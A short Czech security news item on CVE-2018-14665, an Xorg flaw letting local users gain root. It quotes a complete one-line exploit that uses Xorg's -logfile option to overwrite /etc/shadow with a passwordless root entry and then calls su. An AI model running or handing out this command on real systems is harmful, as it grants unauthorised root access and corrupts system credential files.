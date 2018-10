Bezpečnostní chyba CVE-2018–14665 umožňuje přihlášeným uživatelům s přístupem k terminálu spouštět libovolný kód s právy roota. Může za to chybná kontrola oprávnění při spouštění Xorg s parametry -modulepath a -logfile . Problém se týká linuxových distribucí i BSD systémů.

Chyba je zneužitelná tak snadno, že je možné exploit napsat na Twitter:

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su



Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.